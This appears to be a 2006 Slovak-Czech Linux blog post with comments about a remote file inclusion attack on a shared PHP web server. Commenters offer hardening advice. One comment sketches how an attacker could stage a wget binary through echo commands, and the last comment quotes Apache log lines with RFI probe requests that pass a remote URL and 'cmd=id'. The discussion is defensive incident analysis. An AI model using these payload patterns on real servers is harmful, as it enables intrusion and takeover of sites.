Pár dní po hackerskom útoku

Přihlášení | Registrace

napište » Zprávičky

dnes 18:11 | Nová verze

Yocto Project byl vydán ve verzi 5.0. Její kódové jméno je Scarthgap. Yocto Project usnadňuje vývoj vestavěných (embedded) linuxových systémů na míru konkrétním zařízením. Cílem projektu je nabídnou vývojářům vše potřebné. Jedná se o projekt Linux Foundation.

Ladislav Hagara | Komentářů: 0

9front "do not install"

dnes 17:56 | Nová verze

Operační systém 9front, fork operačního systému Plan 9, byl vydán v nové verzi "do not install" (pdf). Více o 9front v FQA.

Ladislav Hagara | Komentářů: 0

PeerTube 6.1

dnes 13:11 | Nová verze

Svobodná webová platforma pro sdílení a přehrávání videí PeerTube (Wikipedie) byla vydána v nové verzi 6.1. Přehled novinek i s náhledy v oficiálním oznámení a na GitHubu. Řešeny jsou také 2 bezpečnostní chyby.

Ladislav Hagara | Komentářů: 3

run0, alternativa k příkazu sudo založena na systemd

dnes 12:33 | Zajímavý software

Lennart Poettering na Mastodonu představil utilitu run0. Jedná se o alternativu k příkazu sudo založenou na systemd. Bude součástí systemd verze 256.

Ladislav Hagara | Komentářů: 13

Amarok 3.0 "Castaway"

včera 23:22 | Nová verze

Hudební přehrávač Amarok byl vydán v nové major verzi 3.0 postavené na Qt5/KDE Frameworks 5. Předchozí verze 2.9.0 vyšla před 6 lety a byla postavená na Qt4. Portace Amaroku na Qt6/KDE Frameworks 6 by měla začít v následujících měsících.

Ladislav Hagara | Komentářů: 11

Ubuntu 24.10 bude Oracular Oriole

včera 21:44 | Komunita

Ubuntu 24.10 bude Oracular Oriole (věštecká žluva).

Ladislav Hagara | Komentářů: 11

Git 2.45.0

včera 20:22 | Nová verze

Byla vydána nová verze 2.45.0 distribuovaného systému správy verzí Git. Přispělo 96 vývojářů, z toho 38 nových. Přehled novinek v příspěvku na blogu GitHubu a v poznámkách k vydání. Vypíchnout lze počáteční podporu repozitářů, ve kterých lze používat SHA-1 i SHA-256.

Ladislav Hagara | Komentářů: 0

Před 25 lety, ve čtvrtek 29. dubna 1999, byla spuštěna služba "Úschovna"

včera 13:33 | IT novinky

Před 25 lety, ve čtvrtek 29. dubna 1999, byla spuštěna služba "Úschovna".

Ladislav Hagara | Komentářů: 0

Shotcut 24.04.28 a MLT 7.24.0

včera 01:00 | Nová verze

Byla vydána nová verze 24.04.28 s kódovým názvem Time After Time svobodného multiplatformního video editoru Shotcut (Wikipedie) a nová verze 7.24.0 souvisejícího frameworku MLT Multimedia Framework. Nejnovější Shotcut je vedle zdrojových kódů k dispozici také ve formátech AppImage, Flatpak a Snap.

Ladislav Hagara | Komentářů: 0

RISC OS 5.30

28.4. 16:33 | Nová verze

Byla vydána verze 5.30 dnes již open source operačního systému RISC OS (Wikipedie).

Ladislav Hagara | Komentářů: 0

Centrum | Napsat | Starší

navrhněte » Anketa

KDE Plasma 6

už používám (75%)

čekám, až se dostane do mé distibuce (8%)

čekám na pozdější vydání v řadě (2%)

preferuji jiné desktopové prostředí (15%)

Celkem 887 hlasů

Komentářů: 4, poslední 6.4. 15:51

Rozcestník

AbcLinuxu

HDmag.cz

xadam - adam

Aktuální zápisy

? Archív

? Navigace

Nej blogů na AbcLinuxu

Nejčtenější za poslední měsíc

Nejkomentovanější za poslední měsíc

AbcLinuxu:/ Blogy / adam / Linux / Pár dní po hackerskom útoku

Štítky: Apache, databáze, FTP, IDE, Internet, KDE, MySQL, PHP, programování, stahování, wget

Pár dní po hackerskom útoku

11.7.2006 02:13 | Přečteno: 1691× | Linux | poslední úprava: 11.7.2006 02:14

Viem že je na hanbu keď vám niekto napadne webový server na ktorom závisí množstvo informácií a pri ktorom ste strávili nemalé množstvo času. Podarilo sa nám odhaliť útok, ktorý bol smerovaný na náš server za pomoci diery v jednej web-stránke z množstva u nás prevádzkovaných.

V nedeľu som si s kolegom prezeral logy servera a čo to zrazu vidíme. Niekto sa snažil skoro týždeň o script injection a vcelku úspešne...

Prišli sme na to že v skriptoch jednej stránky sa nachádza diera, ktorá umožňuje jednoduchým zadaním parametra za adresou vkladať cestu ku skriptom ktoré sa nachádzajú na druhom serveri niekde vo svete a následne ich interpretovať na našom servery.
Za pomoci takejto diery sa útočníkovi podarilo interpretovať shell príkazy, takže si vytvoril najskôr v /temp svoje adresáre, tu sa mu podarilo vytvoriť si vlastne ftp, pravdaže zdrojáky si stiahol pomocou wget a skompiloval. Prezrel celu štruktúru systému a našiel si vhodne miestečko kde ukladal dáta ktoré si neskôr vyzdvihoval (filmy, mp3..) Keďže mame priame pripojenie k optike, máme výhodnú rýchlosť pripojenia a vcelku dosť priestoru na diskoch, útočník mal možno menšiu rýchlosť. Podľa obsahu ktorí hromadil sme usúdili že ide pravdepodobne o taliana (nieže by bol talian, ale vyznal sa dosť :)

Chcem sa spýtať. Aké mate skúsenosti so zabezpečením servera a ako by ste riešili podobnú situáciu? Ako sa jej dá predísť s ohľadom na to že na serveri mate veľké množstvo webových stránok rôznych užívateľov, kde nastáva problem s ošetrením chyb v skriptoch interpretovaných na servery a umožňujúcich použitie script injection. Aká kombinácia verzií Apache, PHP a MySQL je vhodná a s akými nastaveniami?

Ďakujem za každú reakciu :)

Hodnocení: 100 %

špatné • dobré

Tiskni Sdílej:

Komentáře

Nástroje: Začni sledovat (3) ? , Tisk

Vložit další komentář

11.7.2006 02:58 Creckx | skóre: 23 | blog: cxblog | Lanškroun
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Odpovědět | Sbalit | Link | Blokovat | Admin

Už je to dlouho co jsem si hrál s nastavováním PHP. Nemá náhodou něco jako SafeMode, kterej znepřístupní nebezpečné fce? Jinak bych to neřešil :) DoS útoky jsou větší hnus, tohle je ještě sranda :)

Můj blog Pokud máte taky blog, můžeme vyměnit odkazy :)

12.7.2006 14:50 xadam | skóre: 1 | blog: adam
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Ano to je pravda, mal som moznost vidiet jadan priebeh organizovaneho DOS utoku. Bol tam paradny trafik, niekolko sto megabit :)

12.7.2006 17:16 Creckx | skóre: 23 | blog: cxblog | Lanškroun
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Šéf jen co zapojil server do sítě tak stovky IP adres se začalo dotazovat. Pěkně přes POST tlačily data :)

Můj blog Pokud máte taky blog, můžeme vyměnit odkazy :)

11.7.2006 06:59 Ladislav Sückr | skóre: 21
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Odpovědět | Sbalit | Link | Blokovat | Admin

Ten wget a kompilátor máte na produkčním serveru?

Myslet špatně je lepší než nemyslet vůbec.

11.7.2006 08:08 Filip Jirsák | skóre: 68 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Třeba s Gentoo je docela problém nemít wget a kompilátor. I když taky to jde, samozřejmě…

Spíš je IMHO důležité útočníka na server vůbec nepustit. Když už může vykonávat shell skripty kdekoliv z internetu, není pro něj problém vykonávat po částech shell script

echo "blabla" > wget
echo "bleble" >> wget
chmod u+x wget

A takhle si na server poslat svou kopii staticky slinkovaného wgetu. A tím si pak stáhnout kompilátor.

11.7.2006 11:23 David Watzke | skóre: 74 | blog: Blog... | Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Gentoo bez kompilátoru je jako ryba bez vody, herní stanice bez monitoru, já bez počítače, nebo prdel bez hrnce - nemožný :-)

“Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon

11.7.2006 11:39 Heron | skóre: 53 | blog: root_at_heron | Olomouc
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Ale tady jde o komerční server, ne o hračku pro děti ;-)

Heron

11.7.2006 11:54 David Watzke | skóre: 74 | blog: Blog... | Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Ňákej vostrej ... ;-)

“Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon

11.7.2006 12:26 Michal Vyskočil | skóre: 60 | blog: miblog | Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Fakt? To nejde ani přeložit balíčky jinde a na serveru instalovat binární verze?

When your hammer is C++, everything begins to look like a thumb.

11.7.2006 12:31 David Watzke | skóre: 74 | blog: Blog... | Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Jasně že jde, ale víš jak to myslím. Je to proti přírodě :-D

Taky můžeš mít herní stanici bez monitoru.

“Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon

11.7.2006 12:31 kaaja | skóre: 24 | blog: Sem tam něco | Podbořany, Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Samozdrejme, ze to de, jenom to nedela.

12.7.2006 01:01 Ondřej Čečák | skóre: 33
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

To mi jako problem nepripada, vzhledem k tomu, ze si ten wget muzu treba pomoci diry v PHP na system protlacit a pak si cokoli dalsiho treba zkompilovat a stahnout -- rychle a celkem elegantne.

-- "Ja vim, on vi, ty pico!"

11.7.2006 08:02 Filip Jirsák | skóre: 68 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Odpovědět | Sbalit | Link | Blokovat | Admin

Především by web server neměl běžet s právy roota, ale pod nějakým uživatelem, kterému vhodně omezím přístup.

11.7.2006 10:05 Aldagautr | skóre: 20
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Odpovědět | Sbalit | Link | Blokovat | Admin

muzes zacit tady

o svobodu prichazi nejsnaze ten, kdo o ni nikdy nebojoval

11.7.2006 11:10 kaaja | skóre: 24 | blog: Sem tam něco | Podbořany, Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Odpovědět | Sbalit | Link | Blokovat | Admin

Protoze potrebuji tahat nektere stranky online z jineho serveru tak jsem server zabezpecil tak, ze jsem v iptables zakazal odchozi spojeni na vsechny krome vybranych serveru (DNS, SMTP a par dalsich). Bohuzel si myslim, ze kdyz clovek provozuje PHP aplikace tretich stran, tak si nikdy nemuze byt jisty, ze na serveru nema diru :-(

. Takze mozna neco jako bezici snort, semtam skusit nessus (stalo se mi, ze mi rekl o dire ktera byla v jedne aplikaci co provozuji), pravidelne zalohovat a modlit se :-(

. Doufam, ze me nikdo za to co delam neukamenuje (nemyslim si, ze jsem dobry administrator, sem spise programator a tak ten server i vypada, ale snazim se).

11.7.2006 23:56 Jakub Suchy | skóre: 22 | Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Staci v php.ini dat allow_url_fopen Off a open_basedir na domovsky adresar uzivatele a /tmp. bohuzel je to nutne udelat per virtualhost...

Drupal

11.7.2006 11:28 kaaja | skóre: 24 | blog: Sem tam něco | Podbořany, Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Odpovědět | Sbalit | Link | Blokovat | Admin

Jeste pro pobaveni jak jsem si zabezpecit server (pouzivaji ho jen ostatni servery pro autentizaci uzivatelu) . Tak jsem ho zabezpecoval pres iptables, az se mi podarilo zabit ssh port. To by nebylo tak hrozne, kdyby jsem k tomu serveru mel pripojenou klavesnici a monitor. Zatim sem se jeste nedokopal k tomu, abych to obnovil :-)

12.7.2006 22:24 xadam | skóre: 1 | blog: adam
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

asi ti pristup k tomu serveru nechyba ze? ...:) Mame spravene tiez iptablesy, je to vcelku dobra vec. Ale pri velkom pocte pocitacov clovek obcas na nieco zabudne, lebo robi moc rychlo ked je vela inej prace ;)

11.7.2006 23:32 diverman | skóre: 32 | blog: život s tučňáčkem
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Odpovědět | Sbalit | Link | Blokovat | Admin

To se mi taky stalo, zalozil jsem u sebe docasny ucet se stejnym jmenem a heslem, ktery jsem potom zapomel vymazat. A on si tam wgetem stahl nejaky scannery, brutal-forcy atd... Vic se nestalo. A zapomel po sobe vymazat .bash_history :-)

deb http://ftp.cz.debian.org/debian jessie main contrib non-free

12.7.2006 02:46 k3 | skóre: 15 | blog:
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

krom toho, ze to vypada na slusnou lamu tak to nedela jen pro zabavu... mezi tema jeho vecma se da najit par divnejch veci.. napr ebay.zip moc jsem toho teda nestahl.. kdyz jsem si to chtel zmirrorovat tak na te sajte dosel traffic limit :(

10.11.2006 15:07 xadam | skóre: 1 | blog: adam
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Odpovědět | Sbalit | Link | Blokovat | Admin

stle sa vedu utoky podobneho charakteru. prikladam vypis z konzoly (access_log) apache

more /var/log/apache/access_log | grep http:// | grep 10/Nov/2006
82.7.25.196 - - [10/Nov/2006:00:18:21 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
70.42.51.20 - - [10/Nov/2006:01:58:54 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
193.179.220.253 - - [10/Nov/2006:06:34:23 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
84.47.91.200 - - [10/Nov/2006:08:34:44 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
193.87.64.155 - - [10/Nov/2006:09:15:21 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.0" 200 72
195.91.54.84 - - [10/Nov/2006:12:56:18 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
195.49.188.227 - - [10/Nov/2006:12:59:30 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.0" 200 72
151.56.239.254 - - [10/Nov/2006:14:21:32 +0100] "GET /index.php?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
151.56.239.254 - - [10/Nov/2006:14:21:34 +0100] "GET /index.php?start=1&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=1 HTTP/1.1" 200 46373
151.56.239.254 - - [10/Nov/2006:14:21:35 +0100] "GET /index.php?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:14:58:30 +0100] "GET /index.php/?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:14:58:58 +0100] "GET /index.php/?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:14:59:00 +0100] "GET /index.php/?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:15:03:45 +0100] "GET /index.php?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:15:04:32 +0100] "GET //index.php?start=1&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=1 HTTP/1.1" 200 46373
193.87.65.21 - - [10/Nov/2006:15:04:44 +0100] "GET //index.php?start=1&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=1 HTTP/1.1" 200 46373
193.87.65.21 - - [10/Nov/2006:15:05:24 +0100] "GET /index.php?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608

Založit nové vlákno • Nahoru

Píšeme jinde

ISSN 1214-1267 www.czech-server.cz

Redakce | Inzerce | Podmínky použití | Osobní údaje